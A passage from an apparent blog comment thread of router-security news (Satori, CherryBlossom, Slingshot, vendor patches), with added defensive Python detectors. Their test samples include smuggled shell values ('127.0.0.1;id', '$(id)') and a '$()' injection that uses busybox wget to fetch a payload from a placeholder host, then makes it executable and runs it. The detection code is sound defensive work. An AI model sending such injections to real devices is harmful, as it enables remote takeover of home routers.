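BENIGN_REQUEST = """<s:Envelope xmlns:s="%s">
 <s:Body>
  <u:SetNTPServers xmlns:u="%s">
   <NewNTPServer1>pool.ntp.org</NewNTPServer1>
   <NewNTPServer2></NewNTPServer2>
  </u:SetNTPServers>
 </s:Body>
</s:Envelope>""" % (SOAP_NS, TIME_NS)
INJECTED_REQUEST = BENIGN_REQUEST.replace("pool.ntp.org", "127.0.0.1;id")

if __name__ == "__main__":
    lan = "192.168.1.0/24"
    for label, req, src in (("benign from LAN", BENIGN_REQUEST, "192.168.1.20"),
                            ("benign from WAN", BENIGN_REQUEST, "203.0.113.5"),
                            ("injected from LAN", INJECTED_REQUEST, "192.168.1.20")):
        r = inspect_request(req, src, lan)
        print("%-18s accept=%s from_lan=%s injection=%s" %
              (label, r["accept"], r["from_lan"], r["injection"]))
    print("unsafe command line would be:", unsafe_ntp_command("127.0.0.1;id"))
```

    The source check alone is what the TR-064 specification intends and would have stopped the worm described above; the allow-list validator is the fix for the injection itself, and rejecting a value that fails it is safer than trying to strip metacharacters out of it.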
  32. Tomi Engdahl says:

    TalkTalk’s wi-fi hack advice is ‘astonishing’
    http://www.bbc.com/news/technology-38223805

    TalkTalk’s handling of a wi-fi password breach is being criticised by several cyber-security experts.

    The BBC has presented the company with evidence that many of its customers’ router credentials have been hacked, putting them at risk of data theft.

    The UK broadband provider confirmed that the sample of stolen router IDs it had been shown was real.

    But it is still advising users that there is “no need” to change their routers’ settings.

    A cyber-security advisor to Europol said he was astounded by the decision.

    “If TalkTalk has evidence that significant numbers of passwords are out in the wild, then at the very least they should be advising their customers to change their passwords,” said the University of Surrey’s Prof Alan Woodward.

    “To say they see no need to do so is, frankly, astonishing.”

    A spokeswoman for TalkTalk said that customers could change their settings “if they wish” but added that she believed there was “no risk to their personal information”.

    She referred the BBC to another security expert. But when questioned, he also said the company should change its advice.

    The BBC was subsequently contacted by someone who said he had access to a database of 57,000 router IDs that had been scraped before any fix had been rolled out.

    He did not reveal his identity, but agreed to share a sample of the credentials that had been harvested.

    The list contained details of about 100 routers including:

    their service set identifier (SSID) codes and media access control (MAC) addresses. These can be entered into online tools that reveal the physical location of the routers
    the router passwords, which would allow someone who travelled to the identified property to access the wi-fi network

    The source said he wanted to highlight the problem because other more malevolent actors might have carried out a similar operation.

    Prof Alan Woodward said once a hacker was outside a vulnerable property, they could:

    snoop in the resident’s data, which might be clearly visible or encrypted in ways that still allowed the original information to be easily recovered
    use the internet connection to mount an onward attack. The hacker could do this to hide their own identity or to co-opt the router to join an army of other compromised equipment in later DDoS (distributed denial of service) attacks
    log in to the router as the administrator and mount a “man in the middle attack”, where apparently secure communications could be listened in on
    substitute the router’s firmware with a modified version that provided a backdoor for later access even if the device was reset

    ‘Fast and loose’

    TalkTalk’s spokeswoman referred the BBC to Steve Armstrong, a cyber-security instructor that she said would support it on the matter.

    He said the risk to an individual user was relatively low.

    “If you look at the average home user and what is on their home network, that would be exposed to an attacker,… then there is not a great deal.

    “The risk is probably no higher than using a [coffee shop's] open wi-fi network.”

    But he added that he still felt TalkTalk was giving the wrong advice.

    “Part of my pushback to them is that they should be telling people, ‘You need to change your password,’” he said.

    Reply
  33. Tomi Engdahl says:

    Netgear Patches RCE Flaws in Routers, Switches
    http://www.securityweek.com/netgear-patches-rce-flaws-routers-switches

    Netgear recently informed customers that it has released firmware updates for some of its routers and switches to address remote code execution and other types of vulnerabilities.

    Netgear announced the launch of a bug bounty program in early January and the company has been regularly publishing security advisories and notifications over the past months. The firm has been offering between $150 and $15,000 for responsibly disclosed vulnerabilities, and it already claims to have rewarded more than 150 bug reports.

    In the most recent advisories, Netgear informed users about the existence of CVE-2017-6862, a buffer overflow vulnerability that can be exploited by a remote attacker to bypass authentication and execute arbitrary commands.

    The flaw, discovered by Maxime Peterlin of ON-X, affects WNR2000v3, WNR2000v4, WNR2000v5 and R2000 routers. Firmware updates that patch the vulnerability are available for all impacted models.

    Security Advisory for Authentication Bypass and Remote Command Execution on Some Smart and Managed Switches, PSV-2017-0857
    https://kb.netgear.com/000038519/Security-Advisory-for-Authentication-Bypass-and-Remote-Command-Execution-on-Some-Smart-and-Managed-Switches-PSV-2017-0857

    Reply
  34. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    WikiLeaks documents show how CIA infected WiFi routers from 10 manufacturers including D-Link and Linksys to monitor and manipulate traffic, infect more devices

    Advanced CIA firmware has been infecting Wi-Fi routers for years
    Latest Vault7 release exposes network-spying operation CIA kept secret since 2007.
    https://arstechnica.com/security/2017/06/advanced-cia-firmware-turns-home-routers-into-covert-listening-posts/

    Home routers from 10 manufacturers, including Linksys, DLink, and Belkin, can be turned into covert listening posts that allow the Central Intelligence Agency to monitor and manipulate incoming and outgoing traffic and infect connected devices. That’s according to secret documents posted Thursday by WikiLeaks.

    CherryBlossom, as the implant is code-named, can be especially effective against targets using some D-Link-made DIR-130 and Linksys-manufactured WRT300N models because they can be remotely infected even when they use a strong administrative password. An exploit code-named Tomato can extract their passwords as long as a default feature known as universal plug and play remains on. Routers that are protected by a default or easily-guessed administrative password are, of course, trivial to infect. In all, documents say CherryBlossom runs on 25 router models, although it’s likely modifications would allow the implant to run on at least 100 more.

    The 175-page CherryBlossom user guide describes a Linux-based operating system that can run on a broad range of routers. Once installed, CherryBlossom turns the device into a “FlyTrap” that beacons a CIA-controlled server known as a “CherryTree.” The beacon includes device status and security information that the CherryTree logs to a database. In response, the CherryTree sends the infected device a “Mission” consisting of specific tasks tailored to the target. CIA operators can use a “CherryWeb” browser-based user interface to view Flytrap status and security information, plan new missions, view mission-related data, and perform system administration tasks.

    SRI-SLO-FF-2012-177-CherryBlossom_UsersManual_CDRL-12_SLO-FF-2012-171
    https://wikileaks.org/vault7/document/SRI-SLO-FF-2012-177-CherryBlossom_UsersManual_CDRL-12_SLO-FF-2012-171/

  35. Tomi Engdahl says:

    Serious Vulnerabilities Disclosed in Modems Used by AT&T’s U-verse Service
    http://www.securityweek.com/serious-vulnerabilities-disclosed-modems-used-atts-u-verse-service

    Five vulnerabilities have been found in Arris-manufactured home networking equipment supplied in AT&T’s U-verse service. The vulnerabilities are considered so trivial to exploit that they have been disclosed to the public without waiting for remedial work from either Arris or AT&T.

    On one of the vulnerabilities, Joseph Hutchins of Nomotion Software reported yesterday, “It is hard to believe that no one is already exploiting this vulnerability at the detriment of innocents. Which is why this report is not passing Go, not collecting $200, and is going straight to the public domain.”

    Arris has said that it is investigating the claims and cannot yet comment; but that it will take any necessary action to protect users of its devices.

    It is worth noting that Arris is not a stranger to vulnerabilities — a talk “CableTap: Wireless Tapping Your Home Network” was recently delivered at Def Con.

    Right now, U-verse users should be aware that these are serious vulnerabilities. Tod Beardsley, Research Director at Rapid7, told SecurityWeek by email, they “include three separate maintenance interfaces over SSH and two hidden HTTP-based services, all of which are reachable from the internet with hard-coded credentials and susceptible to command injection attacks. In addition, Nomotion discovered an unauthenticated firewall bypass vulnerability, which appears to be a rudimentary reverse TCP proxy, allowing unfettered access from the internet to computers on the LAN side. Any one of these vulnerabilities is disastrous for AT&T U-Verse customers, since they ultimately bypass any security controls offered by these modems.”

  36. Tomi Engdahl says:

    Judge Kills FTC Lawsuit Against D-Link for Flimsy Security
    https://yro.slashdot.org/story/17/09/21/1744203/judge-kills-ftc-lawsuit-against-d-link-for-flimsy-security

    Earlier this year, the Federal Trade Commission filed a complaint against network equipment vendor D-Link saying inadequate security in the company’s wireless routers and internet cameras left consumers open to hackers and privacy violations. The FTC, in a complaint filed in the Northern District of California charged that “D-Link failed to take reasonable steps to secure its routers and Internet Protocol (IP) cameras, potentially compromising sensitive consumer information, including live video and audio feeds from D-Link IP cameras.”

    Fast forward nine months, a judge has dismissed the FTC’s case, claiming that the FTC failed to provide enough specific examples of harm done to consumers, or specific instances when the routers in question were breached.

    Judge Kills FTC Lawsuit Against D-Link for Flimsy Security
    http://www.dslreports.com/shownews/Judge-Kills-FTC-Lawsuit-Against-DLink-for-Flimsy-Security-140369

  37. Tomi Engdahl says:

    D-Link Patches Recently Disclosed Router Vulnerabilities
    http://www.securityweek.com/d-link-patches-recently-disclosed-router-vulnerabilities

    D-Link has released firmware updates for its DIR-850L router to address a majority of the vulnerabilities disclosed recently by a security researcher.

    Earlier this month, researcher Pierre Kim disclosed the details of several flaws affecting D-Link DIR-850L routers and the company’s mydlink cloud services. The expert decided to make his findings public without giving D-Link time to release fixes due to the way the vendor had previously handled patching and coordination.

    D-Link has now released updates for both revision A and B of the firmware for DIR-850L devices. The company has provided detailed instructions for updating the firmware, which it says is a two-step process.

    The vulnerabilities found by Kim include the lack of firmware protections, cross-site scripting (XSS), denial-of-service (DoS), and weaknesses that can be exploited to execute arbitrary commands.

    D-Link also announced this week that a federal judge has dismissed three of the six counts in a complaint filed in January by the U.S. Federal Trade Commission (FTC) against the company over its alleged failure to implement proper security measures and making deceptive claims about the security of its products.

  38. Tomi Engdahl says:

    Germany on Guard Against Election Hacks, Fake News
    http://www.securityweek.com/germany-guard-against-election-hacks-fake-news

    As the clock ticks down to elections Sunday, Germany’s cyber defense nervously hopes it’ll be third time lucky after Russia was accused of meddling in the US and French votes.

    But even if Berlin avoids a last-minute bombshell of leaks or online sabotage, it sees Moscow’s hand in fanning fears of Muslim migrants that are driving the rise of the hard-right.

    Forecasters say Chancellor Angela Merkel is almost certain to win.

    But she will also face, for the first time in German post-war history, a right-wing populist and anti-immigration party with its own group on the opposition benches.

  39. Tomi Engdahl says:

    Insteon and Wink home hubs appear to have a problem with encryption
    Which is to say neither do it
    https://www.theregister.co.uk/2017/09/25/home_hub_insecurity/

    Security researchers have discovered that two popular home automation systems are vulnerable to attacks.

    The Insteon Hub and Wink Hub 2 are designed to connect various home products and manage automation, and the flaws represent another entry in the growing catalogue of IoT security shortcomings.

    Rapid7 discovered two unpatched issues related to authentication and radio transmission security of the Insteon Hub. Firstly the account login and passwords for both Insteon services and the Hub hardware are stored unencrypted. In addition the radio transmissions between the hub and connected devices are unencrypted. This means malicious actors can easily capture the radio signals at any time to manipulate any device being managed via the Insteon Hub.

  40. Tomi Engdahl says:

    Mirai Variant “Satori” Targets Huawei Routers
    http://www.securityweek.com/mirai-variant-satori-targets-huawei-routers

    Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.

    The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.

    Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

    The affected device supports a service type named `DeviceUpgrade`, which is supposedly carrying out firmware upgrade actions. By injecting shell meta-characters “$()” in two elements with which the upgrade is carried out, a remote administrator could execute arbitrary code on the affected devices.

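The injection pattern described in the comment above, as an added example that is not Check Point's, Huawei's or the botnet's code: a small Python detector that flags TR-064 DeviceUpgrade requests whose element values carry shell metacharacters, next to the argv-based handler that closes the hole. The request path (/ctrlt/DeviceUpgrade_1), the two element names (NewStatusURL, NewDownloadURL) and the two sample bodies are assumptions drawn from public write-ups of the CVE, not from this page; 203.0.113.5 is a documentation address.

```python
"""Spot CVE-2017-17215-style command injection in TR-064 'DeviceUpgrade'
SOAP requests, and show the allow-list a fixed handler should apply.

Added example, not vendor, researcher or malware code.  The request path,
element names and sample bodies below are assumptions taken from public
write-ups of the CVE; the sample requests are constructed."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Metacharacters that let an element value escape from a shell command line.
SHELL_META = ("$(", "`", ";", "|", "&&", "\n")

# The only shape a legitimate upgrade URL may take: http(s), host, optional port and path.
SAFE_URL = re.compile(
    r"^https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~\-/%?=&]*)?$"
)

# Constructed sample: a benign upgrade request ...
BENIGN = """<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>http://fw.example.net/status</NewStatusURL>
<NewDownloadURL>http://fw.example.net/hg532.bin</NewDownloadURL>
</u:Upgrade></s:Body></s:Envelope>"""

# ... and one carrying the "$()" injection in both upgrade elements.
MALICIOUS = """<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>$(/bin/busybox wget -g 203.0.113.5 -l /tmp/x -r /x; chmod +x /tmp/x; /tmp/x)</NewStatusURL>
<NewDownloadURL>$(id)</NewDownloadURL>
</u:Upgrade></s:Body></s:Envelope>"""


def soap_args(body: str) -> Dict[str, str]:
    """Return {local element name: text} for every leaf element in the SOAP body."""
    args: Dict[str, str] = {}
    for el in ET.fromstring(body).iter():
        if len(el) == 0 and el.text is not None:
            args[el.tag.rsplit("}", 1)[-1]] = el.text.strip()   # strip the namespace
    return args


def find_injection(path: str, body: str) -> List[Tuple[str, str]]:
    """Detection side: (element, value) pairs carrying shell metacharacters in a
    request to the DeviceUpgrade service.  Matching the service by its name in
    the URL path is an assumption about how the device routes TR-064 calls."""
    if "DeviceUpgrade" not in path:
        return []
    try:
        args = soap_args(body)
    except ET.ParseError:
        return [("<body>", "unparseable XML")]   # malformed input to this service is itself worth a look
    return [(k, v) for k, v in args.items() if any(m in v for m in SHELL_META)]


def vulnerable_cmd(url: str) -> str:
    """The pattern behind the bug: the element text is pasted into a shell
    string, so "$(...)" inside it runs before wget ever sees a URL."""
    return "wget -O /tmp/fw.bin " + url


def hardened_cmd(url: str) -> List[str]:
    """Fixed handler: refuse anything that is not a plain http(s) URL, and pass
    the value to the program as one argv element, never through a shell."""
    if not SAFE_URL.fullmatch(url):
        raise ValueError("upgrade URL rejected: %r" % url)
    return ["wget", "-O", "/tmp/fw.bin", url]


if __name__ == "__main__":
    for name, value in find_injection("/ctrlt/DeviceUpgrade_1", MALICIOUS):
        print("injection in", name, "->", value)
```

The detector is deliberately narrow (path plus metacharacters in leaf values) so it can run in-line on a proxy or IDS log; the hardened handler is the real fix, because validating the URL shape and avoiding the shell entirely makes the metacharacter list irrelevant.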
  41. Tomi Engdahl says:

    Flaws Affecting Top-Selling Netgear Routers Disclosed
    http://www.securityweek.com/flaws-affecting-top-selling-netgear-routers-disclosed

    Security firm Trustwave has disclosed the details of several vulnerabilities affecting Netgear routers, including devices that are top-selling products on Amazon and Best Buy.

    The flaws were discovered by researchers in March 2017 and they were patched by Netgear in August, September and October.

    One of the high severity vulnerabilities has been described as a password recovery and file access issue affecting 17 Netgear routers and modem routers, including best-sellers such as R6400, R7000 (Nighthawk), R8000 (Nighthawk X6), and R7300DST (Nighthawk DST).

  42. Tomi Engdahl says:

    ‘Slingshot’ Malware That Hid For Six Years Spread Through Routers
    https://it.slashdot.org/story/18/03/12/2034219/slingshot-malware-that-hid-for-six-years-spread-through-routers

    Security researchers at Kaspersky Lab have discovered what’s likely to be another state-sponsored malware strain, and this one is more advanced than most. Nicknamed Slingshot, the code spies on PCs through a multi-layer attack that targets MikroTik routers. It first replaces a library file with a malicious version that downloads other malicious components, and then launches a clever two-pronged attack on the computers themselves.

    Sophisticated malware attacks through routers
    It’s likely the creation of a government surveillance agency.
    https://www.engadget.com/2018/03/11/sophisticated-malware-attacks-through-routers/

    Security researchers at Kaspersky Lab have discovered what’s likely to be another state-sponsored malware strain, and this one is more advanced than most. Nicknamed Slingshot, the code spies on PCs through a multi-layer attack that targets MikroTik routers. It first replaces a library file with a malicious version that downloads other malicious components, and then launches a clever two-pronged attack on the computers themselves. One, Canhadr, runs low-level kernel code that effectively gives the intruder free rein, including deep access to storage and memory; the other, GollumApp, focuses on the user level and includes code to coordinate efforts, manage the file system and keep the malware alive.

    Kaspersky describes these two elements as “masterpieces,” and for good reason. For one, it’s no mean feat to run hostile kernel code without crashes. Slingshot also stores its malware files in an encrypted virtual file system, encrypts every text string in its modules, calls services directly (to avoid tripping security software checks) and even shuts components down when forensic tools are active.

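A check a practitioner would want after reading the above, added here and not part of Kaspersky's report or the original comment: a hash baseline for the files a router loads or serves to its clients, diffed later to surface a library swapped for a trojanised copy or a new component dropped beside it. The directory layout and file names are constructed for the demonstration.

```python
"""Baseline-and-diff integrity check, the kind of test that catches a
library file replaced with a malicious version on a router or on the host
that manages it.  Added example, not Kaspersky's or MikroTik's code; the
directory layout and file names are constructed for the demo."""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Stream the file so large firmware images do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map each file under root (path relative to root, '/'-separated) to its SHA-256."""
    manifest: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def _write(path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: record a known-good tree, then replace one library
    in place and drop a new component, as the malware described above does."""
    with tempfile.TemporaryDirectory() as root:
        _write(os.path.join(root, "lib", "helper.so"), b"\x7fELF original helper")
        _write(os.path.join(root, "bin", "agent"), b"\x7fELF agent")
        baseline = build_manifest(root)  # taken while the device is still trusted
        _write(os.path.join(root, "lib", "helper.so"), b"\x7fELF trojanised helper")  # swapped in place
        _write(os.path.join(root, "lib", "dropper.so"), b"\x7fELF dropper")           # new component
        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Keep the baseline manifest off the device, on read-only or signed storage; an attacker who can replace a library can just as easily rewrite a manifest stored next to it, and a malware family that hides from forensic tools should be assumed to look for one.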
  43. Tomi Engdahl says:

    Remotely Exploitable Vulnerability Discovered in MikroTik’s RouterOS
    https://www.securityweek.com/remotely-exploitable-vulnerability-discovered-mikrotiks-routeros

    A vulnerability exists in MikroTik’s RouterOS in versions prior to the latest 6.41.3, released Monday, March 12, 2018. Details were discovered in February and disclosed by Core Security on Thursday.

    MikroTik is a Latvian manufacturer that develops routers and software used throughout the world. RouterOS is its Linux-based operating system.

    The vulnerability, a MikroTik RouterOS SMB buffer overflow flaw, allows a remote attacker with access to the service to gain code execution on the system. Since the overflow occurs before authentication, an unauthenticated remote attacker can exploit it.
